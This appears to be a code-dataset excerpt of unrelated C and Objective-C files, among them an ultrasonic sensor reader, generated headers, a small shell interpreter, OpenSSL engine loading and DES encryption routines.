text
stringlengths
6
1.35M
#include "cart.h" #define max_dis 2000 //define the maximum measured distance #define timeOut max_dis*60 //calculate timeout according to the maximum measured distance //function pulseIn: obtain pulse time of a pin int pulseIn(int pin, int level, int timeout); float getSonar(int trigPin, int echoPin){ //get the measurement result of ultrasonic module with unit: cm long pingTime; float distance; digitalWrite(trigPin,HIGH); //~ delayMicroseconds(10); mydelay(10); digitalWrite(trigPin,LOW); pingTime = pulseIn(echoPin,HIGH,timeOut); //read plus time of echoPin distance = (float)pingTime*340.0/2.0/10000.0; //calculate distance with sound speed return distance; } void init_pins2(){ //function to initialize and setup the mode of each used pin pinMode(trigPin1,OUTPUT); pinMode(echoPin1,INPUT); pinMode(trigPin2,OUTPUT); pinMode(echoPin2,INPUT); pinMode(trigPin3,OUTPUT); pinMode(echoPin3,INPUT); pinMode(trigPin4,OUTPUT); pinMode(echoPin4,INPUT); pinMode(trigPin5,OUTPUT); pinMode(echoPin5,INPUT); pinMode(trigPin6,OUTPUT); pinMode(echoPin6,INPUT); } int main(){ printf("Program starting...\n"); wiringPiSetup(); init_pins2(); float distance1=0, distance2=0, distance3=0,distance4=0,distance5=0,distance6=0; char buf[100]; FILE *fp; while(1){ fp=fopen("/var/lib/cart/dists.txt","w"); if(fp==NULL){ printf("Error opening file..."); exit(-1); } distance1 = getSonar(trigPin1,echoPin1); gcvt(distance1,6,buf); fputs(buf,fp); fputs("\n",fp); distance2 = getSonar(trigPin2,echoPin2); gcvt(distance2,6,buf); fputs(buf,fp); fputs("\n",fp); distance3 = getSonar(trigPin3,echoPin3); gcvt(distance3,6,buf); fputs(buf,fp); fputs("\n",fp); distance4 = getSonar(trigPin4,echoPin4); gcvt(distance4,6,buf); fputs(buf,fp); fputs("\n",fp); distance5 = getSonar(trigPin5,echoPin5); gcvt(distance5,6,buf); fputs(buf,fp); fputs("\n",fp); distance6 = getSonar(trigPin6,echoPin6); gcvt(distance6,6,buf); fputs(buf,fp); fclose(fp); mydelay(50); } return 0; } int pulseIn(int pin, int level, int timeout) { struct timeval tn, t0, t1; long micros; gettimeofday(&t0, NULL); micros = 0; while (digitalRead(pin) != level) { gettimeofday(&tn, NULL); if (tn.tv_sec > t0.tv_sec) micros = 1000000L; else micros = 0; micros += (tn.tv_usec - t0.tv_usec); if (micros > timeout) return 0; } gettimeofday(&t1, NULL); while (digitalRead(pin) == level) { gettimeofday(&tn, NULL); if (tn.tv_sec > t0.tv_sec) micros = 1000000L; else micros = 0; micros = micros + (tn.tv_usec - t0.tv_usec); if (micros > timeout) return 0; } if (tn.tv_sec > t1.tv_sec) micros = 1000000L; else micros = 0; micros = micros + (tn.tv_usec - t1.tv_usec); return micros; }
// // UINavigationController+RVFullscreenPopGesture.h // vsp-vk-iOS // // Created by 蔡宇航 on 2022/1/12. // #import <UIKit/UIKit.h> NS_ASSUME_NONNULL_BEGIN @interface UINavigationController (RVFullscreenPopGesture) @end NS_ASSUME_NONNULL_END
/* * File: rtGetInf.h * * Code generated for Simulink model 'Mount_Drv_PDR2021'. * * Model version : 1.901 * Simulink Coder version : 9.0 (R2018b) 24-May-2018 * C/C++ source code generated on : Tue Aug 24 14:59:10 2021 * * Target selection: ert.tlc * Embedded hardware selection: Intel->x86-64 (Linux 64) * Code generation objectives: Unspecified * Validation result: Not run */ #ifndef RTW_HEADER_rtGetInf_h_ #define RTW_HEADER_rtGetInf_h_ #include <stddef.h> #include "rtwtypes.h" #include "rt_nonfinite.h" extern real_T rtGetInf(void); extern real32_T rtGetInfF(void); extern real_T rtGetMinusInf(void); extern real32_T rtGetMinusInfF(void); #endif /* RTW_HEADER_rtGetInf_h_ */ /* * File trailer for generated code. * * [EOF] */
/* * Generated by asn1c-0.9.24 (http://lionet.info/asn1c) * From ASN.1 module "X2AP-IEs" * found in "/home/oainuc2/openairinterface5g/openair2/X2AP/MESSAGES/ASN1/R11.2/X2AP-IEs.asn" * `asn1c -gen-PER` */ #ifndef _X2ap_Pre_emptionVulnerability_H_ #define _X2ap_Pre_emptionVulnerability_H_ #include <asn_application.h> /* Including external dependencies */ #include <NativeEnumerated.h> #ifdef __cplusplus extern "C" { #endif /* Dependencies */ typedef enum X2ap_Pre_emptionVulnerability { X2ap_Pre_emptionVulnerability_not_pre_emptable = 0, X2ap_Pre_emptionVulnerability_pre_emptable = 1 } e_X2ap_Pre_emptionVulnerability; /* X2ap-Pre-emptionVulnerability */ typedef long X2ap_Pre_emptionVulnerability_t; /* Implementation */ extern asn_TYPE_descriptor_t asn_DEF_X2ap_Pre_emptionVulnerability; asn_struct_free_f X2ap_Pre_emptionVulnerability_free; asn_struct_print_f X2ap_Pre_emptionVulnerability_print; asn_constr_check_f X2ap_Pre_emptionVulnerability_constraint; ber_type_decoder_f X2ap_Pre_emptionVulnerability_decode_ber; der_type_encoder_f X2ap_Pre_emptionVulnerability_encode_der; xer_type_decoder_f X2ap_Pre_emptionVulnerability_decode_xer; xer_type_encoder_f X2ap_Pre_emptionVulnerability_encode_xer; per_type_decoder_f X2ap_Pre_emptionVulnerability_decode_uper; per_type_encoder_f X2ap_Pre_emptionVulnerability_encode_uper; per_type_decoder_f X2ap_Pre_emptionVulnerability_decode_aper; per_type_encoder_f X2ap_Pre_emptionVulnerability_encode_aper; type_compare_f X2ap_Pre_emptionVulnerability_compare; #ifdef __cplusplus } #endif #endif /* _X2ap_Pre_emptionVulnerability_H_ */ #include <asn_internal.h>
/* Copyright 2011 Etay Meiri This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. */ #ifndef TEXTURE_H #define TEXTURE_H #include <string> #include <GL/glew.h> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/highgui/highgui.hpp> class Texture { public: Texture(GLenum TextureTarget, const std::string& FileName); bool Load(); void Bind(GLenum TextureUnit); private: std::string m_fileName; GLenum m_textureTarget; GLuint m_textureObj; cv::Mat m_cv_image; }; #endif /* TEXTURE_H */
/* * Copyright (c) 2001-2019, Arm Limited and Contributors. All rights reserved. * * SPDX-License-Identifier: BSD-3-Clause OR Arm's non-OSI source license * */ /*! @file @brief This file contains the definitions and APIs for Secure SRAM operations. This is a placeholder for platform-specific Secure SRAM implementation. */ /*! @defgroup cc_pal_secure_sram CryptoCell PAL SECURE SRAM APIs @brief Contains PAL SECURE SRAM APIs. See cc_pal_secure_sram.h. @{ @ingroup cc_pal @} */ #ifndef _CC_PAL_SECURE_SRAM_H #define _CC_PAL_SECURE_SRAM_H /*! @brief Reads a word from a specific address in the secure SRAM and write it to a specific address in OTP or to a shadow register. The read of the word is done in-direct and the write of the word is implemented with inline assembler. It is implemented this way in order to bypass the stack and not leave in it parts of the secrets. An external loop need to call this API 4 times in a row @return None */ void CC_PalCopyWordFromSecureSram(unsigned long srcRegAddr, unsigned long destRegAddr); /*! @brief Reads a word from a specific address in the secure SRAM and checks whether it is all 0's or 1's. The read of the word is done in-direct and the comparison of the word is implemented with inline assembler. It is implemented this way in order to bypass the stack and not leave in it parts of the secrets. An external loop need to call this API 4 times in a row @return CC_OK */ uint32_t CC_PalIsSramWordValid(unsigned long srcAddr, uint32_t cmpValue); void CC_PalReadWordFromReg(unsigned long srcAddr); #endif
/* * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ #import <ABI39_0_0React/ABI39_0_0RCTShadowView.h> #import "ABI39_0_0RCTTextAttributes.h" NS_ASSUME_NONNULL_BEGIN extern NSString *const ABI39_0_0RCTBaseTextShadowViewEmbeddedShadowViewAttributeName; @interface ABI39_0_0RCTBaseTextShadowView : ABI39_0_0RCTShadowView { @protected NSAttributedString *_Nullable cachedAttributedText; @protected ABI39_0_0RCTTextAttributes *_Nullable cachedTextAttributes; } @property (nonatomic, strong) ABI39_0_0RCTTextAttributes *textAttributes; - (NSAttributedString *)attributedTextWithBaseTextAttributes:(nullable ABI39_0_0RCTTextAttributes *)baseTextAttributes; @end NS_ASSUME_NONNULL_END
// This toolbox is licensed under the Academic Free License 3.0. // Instituto Tecnológico de Buenos Aires (ITBA). // Last modification: December 19th, 2012. #ifndef GRAPH_GENERATOR_H #define GRAPH_GENERATOR_H #include "../ComplexNets/typedefs.h" #include "../ComplexNets/MolloyReedGraphReader.h" using namespace std; class GraphGenerator { private: typedef struct PolarPosition { double r; double theta; } PolarPosition; GraphGenerator(); static GraphGenerator *instance; float distanceBetweenVertex(unsigned int vertex1Id, unsigned int vertex2Id); void addVertexPosition(); void addEdges(Graph* graph, Vertex* vertex, map<float, unsigned int> distance, unsigned int quant, vector<unsigned int>* vertexIndexes); inline double hiperbolicDistance(PolarPosition p1, PolarPosition p2); inline double getMaxRadius(int i, float a, float c); inline PolarPosition getRandomHyperbolicCoordinates( float a, double maxr ); public: static GraphGenerator *getInstance(); Graph *generateGraphFromFile(string path, bool directed, bool multigraph); DirectedGraph *generateDirectedGraphFromFile(string path, bool multigraph); WeightedGraph *generateWeightedGraphFromFile(string path, bool directed, bool multigraph); Graph* generateErdosRenyiGraph(unsigned int n, float p); Graph* generateBarabasiAlbertGraph(unsigned int m_0, unsigned int m, unsigned int n); Graph* generateHotExtendedGraph(unsigned int m, unsigned int n, float xi, unsigned int q, float r); Graph* generateMolloyReedGraph(string path); Graph* generateHiperbolicGraph(unsigned int n, float a, float c); double getExpectedAvgNodeDeg(unsigned int n, float a, float c); }; #endif
/* * Copyright (C) 2013 Google Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * Neither the name of Google Inc. nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef PrerenderHandle_h #define PrerenderHandle_h #include "core/dom/DocumentLifecycleObserver.h" #include "platform/heap/Handle.h" #include "platform/weborigin/KURL.h" #include "wtf/Noncopyable.h" #include "wtf/PassOwnPtr.h" #include "wtf/PassRefPtr.h" namespace blink { class Document; class Prerender; class PrerenderClient; class PrerenderHandle final : public NoBaseWillBeGarbageCollectedFinalized<PrerenderHandle>, public DocumentLifecycleObserver { WILL_BE_USING_GARBAGE_COLLECTED_MIXIN(PrerenderHandle); USING_FAST_MALLOC_WILL_BE_REMOVED(PrerenderHandle); WTF_MAKE_NONCOPYABLE(PrerenderHandle); public: static PassOwnPtrWillBeRawPtr<PrerenderHandle> create(Document&, PrerenderClient*, const KURL&, unsigned prerenderRelTypes); virtual ~PrerenderHandle(); void cancel(); const KURL& url() const; // From DocumentLifecycleObserver: void documentWasDetached() override; DECLARE_VIRTUAL_TRACE(); private: PrerenderHandle(Document&, PassRefPtr<Prerender>); void detach(); RefPtr<Prerender> m_prerender; }; } #endif // PrerenderHandle_h
/* * Copyright (c) 2016 Mytchel Hammond <mytchel@openmailbox.org> * * Permission is hereby granted, free of charge, to any person * obtaining a copy of this software and associated documentation * files (the "Software"), to deal in the Software without * restriction, including without limitation the rights to use, * copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following * conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES * OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. * */ #include <libc.h> #include <string.h> #include "shell.h" int ret = 0; void shiftstringright(char *s, size_t max, size_t i) { size_t j; j = max - 1; while (j > i) { s[j] = s[j-1]; j--; } } void shiftstringleft(char *s, size_t max) { size_t j; j = 0; while (j < max) { s[j] = s[j + 1]; j++; } } void interp(void) { char line[LINEMAX]; struct token *t; size_t b, m, i; int p[2]; bool q; char c; int r; while (true) { prompt: write(STDOUT, "; ", 2); q = false; b = m = i = 0; while ((r = read(STDIN, &c, sizeof(char))) > 0) { if (c == 127 || c == 8) { if (i > 0) { i--; shiftstringleft(&line[i], m - i); } continue; } else if (i == sizeof(line)) { printf("line length exceded!\n"); goto prompt; } line[i] = c; i++; if (i > m) { m = i; } if (c == '(' || c == '{' || c == '[') { b++; } else if (c == ')' || c == '}' || c == ']') { b--; } else if (c == '\'') { q = !q; } else if (!q && b == 0 && c == '\n' && (i == 0 || line[i-1] != '\\')) { break; } } if (r == 0) { exit(OK); } else if (r < 0) { printf("error reading input: %i\n", r); exit(r); } if (pipe(p) != OK) { printf("pipe error\n"); exit(ERR); } setupinputstring(line, m); while ((t = command(0)) != nil) { ret = types[t->type].eval(t, STDIN, STDOUT); types[t->type].free(t); } } }
// // SDWebImageManager+Custom.h // weixindress // // Created by 杨帆 on 16/3/21. // Copyright © 2016年 www.jd.com. All rights reserved. // #import "SDWebImageManager.h" @interface SDWebImageManager (Custom) - (id <SDWebImageOperation>)customSwizzle_downloadImageWithURL:(NSURL *)url options:(SDWebImageOptions)options progress:(SDWebImageDownloaderProgressBlock)progressBlock completed:(SDWebImageCompletionWithFinishedBlock)completedBlock; - (id <SDWebImageOperation>)downloadWEBPImageWithURL:(NSURL *)url options:(SDWebImageOptions)options progress:(SDWebImageDownloaderProgressBlock)progressBlock completed:(SDWebImageCompletionWithFinishedBlock)completedBlock; @end
/* $OpenBSD: eng_all.c,v 1.25 2014/06/12 15:49:29 deraadt Exp $ */ /* Written by Richard Levitte <richard@levitte.org> for the OpenSSL * project 2000. */ /* ==================================================================== * Copyright (c) 2000-2001 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * licensing@OpenSSL.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ #include "cryptlib.h" #include "eng_int.h" void ENGINE_load_builtin_engines(void) { /* Some ENGINEs need this */ OPENSSL_cpuid_setup(); #if 0 /* There's no longer any need for an "openssl" ENGINE unless, one day, * it is the *only* way for standard builtin implementations to be be * accessed (ie. it would be possible to statically link binaries with * *no* builtin implementations). */ ENGINE_load_openssl(); #endif #ifndef OPENSSL_NO_RSAX ENGINE_load_rsax(); #endif ENGINE_load_dynamic(); #ifndef OPENSSL_NO_STATIC_ENGINE #ifndef OPENSSL_NO_HW #ifndef OPENSSL_NO_HW_PADLOCK ENGINE_load_padlock(); #endif #endif #endif ENGINE_register_all_complete(); }
/* crypto/des/des_enc.c */ /* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com) * All rights reserved. * * This package is an SSL implementation written * by Eric Young (eay@cryptsoft.com). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson (tjh@cryptsoft.com). * * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young (eay@cryptsoft.com)" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed. i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] */ #include "des_locl.h" #include "spr.h" void DES_encrypt1(DES_LONG *data, DES_key_schedule *ks, int enc) { register DES_LONG l,r,t,u; #ifdef DES_PTR register const unsigned char *des_SP=(const unsigned char *)DES_SPtrans; #endif #ifndef DES_UNROLL register int i; #endif register DES_LONG *s; r=data[0]; l=data[1]; IP(r,l); /* Things have been modified so that the initial rotate is * done outside the loop. This required the * DES_SPtrans values in sp.h to be rotated 1 bit to the right. * One perl script later and things have a 5% speed up on a sparc2. * Thanks to Richard Outerbridge <71755.204@CompuServe.COM> * for pointing this out. */ /* clear the top bits on machines with 8byte longs */ /* shift left by 2 */ r=ROTATE(r,29)&0xffffffffL; l=ROTATE(l,29)&0xffffffffL; s=ks->ks->deslong; /* I don't know if it is worth the effort of loop unrolling the * inner loop */ if (enc) { #ifdef DES_UNROLL D_ENCRYPT(l,r, 0); /* 1 */ D_ENCRYPT(r,l, 2); /* 2 */ D_ENCRYPT(l,r, 4); /* 3 */ D_ENCRYPT(r,l, 6); /* 4 */ D_ENCRYPT(l,r, 8); /* 5 */ D_ENCRYPT(r,l,10); /* 6 */ D_ENCRYPT(l,r,12); /* 7 */ D_ENCRYPT(r,l,14); /* 8 */ D_ENCRYPT(l,r,16); /* 9 */ D_ENCRYPT(r,l,18); /* 10 */ D_ENCRYPT(l,r,20); /* 11 */ D_ENCRYPT(r,l,22); /* 12 */ D_ENCRYPT(l,r,24); /* 13 */ D_ENCRYPT(r,l,26); /* 14 */ D_ENCRYPT(l,r,28); /* 15 */ D_ENCRYPT(r,l,30); /* 16 */ #else for (i=0; i<32; i+=4) { D_ENCRYPT(l,r,i+0); /* 1 */ D_ENCRYPT(r,l,i+2); /* 2 */ } #endif } else { #ifdef DES_UNROLL D_ENCRYPT(l,r,30); /* 16 */ D_ENCRYPT(r,l,28); /* 15 */ D_ENCRYPT(l,r,26); /* 14 */ D_ENCRYPT(r,l,24); /* 13 */ D_ENCRYPT(l,r,22); /* 12 */ D_ENCRYPT(r,l,20); /* 11 */ D_ENCRYPT(l,r,18); /* 10 */ D_ENCRYPT(r,l,16); /* 9 */ D_ENCRYPT(l,r,14); /* 8 */ D_ENCRYPT(r,l,12); /* 7 */ D_ENCRYPT(l,r,10); /* 6 */ D_ENCRYPT(r,l, 8); /* 5 */ D_ENCRYPT(l,r, 6); /* 4 */ D_ENCRYPT(r,l, 4); /* 3 */ D_ENCRYPT(l,r, 2); /* 2 */ D_ENCRYPT(r,l, 0); /* 1 */ #else for (i=30; i>0; i-=4) { D_ENCRYPT(l,r,i-0); /* 16 */ D_ENCRYPT(r,l,i-2); /* 15 */ } #endif } /* rotate and clear the top bits on machines with 8byte longs */ l=ROTATE(l,3)&0xffffffffL; r=ROTATE(r,3)&0xffffffffL; FP(r,l); data[0]=l; data[1]=r; l=r=t=u=0; } void DES_encrypt2(DES_LONG *data, DES_key_schedule *ks, int enc) { register DES_LONG l,r,t,u; #ifdef DES_PTR register const unsigned char *des_SP=(const unsigned char *)DES_SPtrans; #endif #ifndef DES_UNROLL register int i; #endif register DES_LONG *s; r=data[0]; l=data[1]; /* Things have been modified so that the initial rotate is * done outside the loop. This required the * DES_SPtrans values in sp.h to be rotated 1 bit to the right. * One perl script later and things have a 5% speed up on a sparc2. * Thanks to Richard Outerbridge <71755.204@CompuServe.COM> * for pointing this out. */ /* clear the top bits on machines with 8byte longs */ r=ROTATE(r,29)&0xffffffffL; l=ROTATE(l,29)&0xffffffffL; s=ks->ks->deslong; /* I don't know if it is worth the effort of loop unrolling the * inner loop */ if (enc) { #ifdef DES_UNROLL D_ENCRYPT(l,r, 0); /* 1 */ D_ENCRYPT(r,l, 2); /* 2 */ D_ENCRYPT(l,r, 4); /* 3 */ D_ENCRYPT(r,l, 6); /* 4 */ D_ENCRYPT(l,r, 8); /* 5 */ D_ENCRYPT(r,l,10); /* 6 */ D_ENCRYPT(l,r,12); /* 7 */ D_ENCRYPT(r,l,14); /* 8 */ D_ENCRYPT(l,r,16); /* 9 */ D_ENCRYPT(r,l,18); /* 10 */ D_ENCRYPT(l,r,20); /* 11 */ D_ENCRYPT(r,l,22); /* 12 */ D_ENCRYPT(l,r,24); /* 13 */ D_ENCRYPT(r,l,26); /* 14 */ D_ENCRYPT(l,r,28); /* 15 */ D_ENCRYPT(r,l,30); /* 16 */ #else for (i=0; i<32; i+=4) { D_ENCRYPT(l,r,i+0); /* 1 */ D_ENCRYPT(r,l,i+2); /* 2 */ } #endif } else { #ifdef DES_UNROLL D_ENCRYPT(l,r,30); /* 16 */ D_ENCRYPT(r,l,28); /* 15 */ D_ENCRYPT(l,r,26); /* 14 */ D_ENCRYPT(r,l,24); /* 13 */ D_ENCRYPT(l,r,22); /* 12 */ D_ENCRYPT(r,l,20); /* 11 */ D_ENCRYPT(l,r,18); /* 10 */ D_ENCRYPT(r,l,16); /* 9 */ D_ENCRYPT(l,r,14); /* 8 */ D_ENCRYPT(r,l,12); /* 7 */ D_ENCRYPT(l,r,10); /* 6 */ D_ENCRYPT(r,l, 8); /* 5 */ D_ENCRYPT(l,r, 6); /* 4 */ D_ENCRYPT(r,l, 4); /* 3 */ D_ENCRYPT(l,r, 2); /* 2 */ D_ENCRYPT(r,l, 0); /* 1 */ #else for (i=30; i>0; i-=4) { D_ENCRYPT(l,r,i-0); /* 16 */ D_ENCRYPT(r,l,i-2); /* 15 */ } #endif } /* rotate and clear the top bits on machines with 8byte longs */ data[0]=ROTATE(l,3)&0xffffffffL; data[1]=ROTATE(r,3)&0xffffffffL; l=r=t=u=0; } void DES_encrypt3(DES_LONG *data, DES_key_schedule *ks1, DES_key_schedule *ks2, DES_key_schedule *ks3) { register DES_LONG l,r; l=data[0]; r=data[1]; IP(l,r); data[0]=l; data[1]=r; DES_encrypt2((DES_LONG *)data,ks1,DES_ENCRYPT); DES_encrypt2((DES_LONG *)data,ks2,DES_DECRYPT); DES_encrypt2((DES_LONG *)data,ks3,DES_ENCRYPT); l=data[0]; r=data[1]; FP(r,l); data[0]=l; data[1]=r; } void DES_decrypt3(DES_LONG *data, DES_key_schedule *ks1, DES_key_schedule *ks2, DES_key_schedule *ks3) { register DES_LONG l,r; l=data[0]; r=data[1]; IP(l,r); data[0]=l; data[1]=r; DES_encrypt2((DES_LONG *)data,ks3,DES_DECRYPT); DES_encrypt2((DES_LONG *)data,ks2,DES_ENCRYPT); DES_encrypt2((DES_LONG *)data,ks1,DES_DECRYPT); l=data[0]; r=data[1]; FP(r,l); data[0]=l; data[1]=r; } #ifndef DES_DEFAULT_OPTIONS #undef CBC_ENC_C__DONT_UPDATE_IV #include "ncbc_enc.i" /* DES_ncbc_encrypt */ void DES_ede3_cbc_encrypt(const unsigned char *input, unsigned char *output, long length, DES_key_schedule *ks1, DES_key_schedule *ks2, DES_key_schedule *ks3, DES_cblock *ivec, int enc) { register DES_LONG tin0,tin1; register DES_LONG tout0,tout1,xor0,xor1; register const unsigned char *in; unsigned char *out; register long l=length; DES_LONG tin[2]; unsigned char *iv; in=input; out=output; iv = &(*ivec)[0]; if (enc) { c2l(iv,tout0); c2l(iv,tout1); for (l-=8; l>=0; l-=8) { c2l(in,tin0); c2l(in,tin1); tin0^=tout0; tin1^=tout1; tin[0]=tin0; tin[1]=tin1; DES_encrypt3((DES_LONG *)tin,ks1,ks2,ks3); tout0=tin[0]; tout1=tin[1]; l2c(tout0,out); l2c(tout1,out); } if (l != -8) { c2ln(in,tin0,tin1,l+8); tin0^=tout0; tin1^=tout1; tin[0]=tin0; tin[1]=tin1; DES_encrypt3((DES_LONG *)tin,ks1,ks2,ks3); tout0=tin[0]; tout1=tin[1]; l2c(tout0,out); l2c(tout1,out); } iv = &(*ivec)[0]; l2c(tout0,iv); l2c(tout1,iv); } else { register DES_LONG t0,t1; c2l(iv,xor0); c2l(iv,xor1); for (l-=8; l>=0; l-=8) { c2l(in,tin0); c2l(in,tin1); t0=tin0; t1=tin1; tin[0]=tin0; tin[1]=tin1; DES_decrypt3((DES_LONG *)tin,ks1,ks2,ks3); tout0=tin[0]; tout1=tin[1]; tout0^=xor0; tout1^=xor1; l2c(tout0,out); l2c(tout1,out); xor0=t0; xor1=t1; } if (l != -8) { c2l(in,tin0); c2l(in,tin1); t0=tin0; t1=tin1; tin[0]=tin0; tin[1]=tin1; DES_decrypt3((DES_LONG *)tin,ks1,ks2,ks3); tout0=tin[0]; tout1=tin[1]; tout0^=xor0; tout1^=xor1; l2cn(tout0,tout1,out,l+8); xor0=t0; xor1=t1; } iv = &(*ivec)[0]; l2c(xor0,iv); l2c(xor1,iv); } tin0=tin1=tout0=tout1=xor0=xor1=0; tin[0]=tin[1]=0; } #endif /* DES_DEFAULT_OPTIONS */
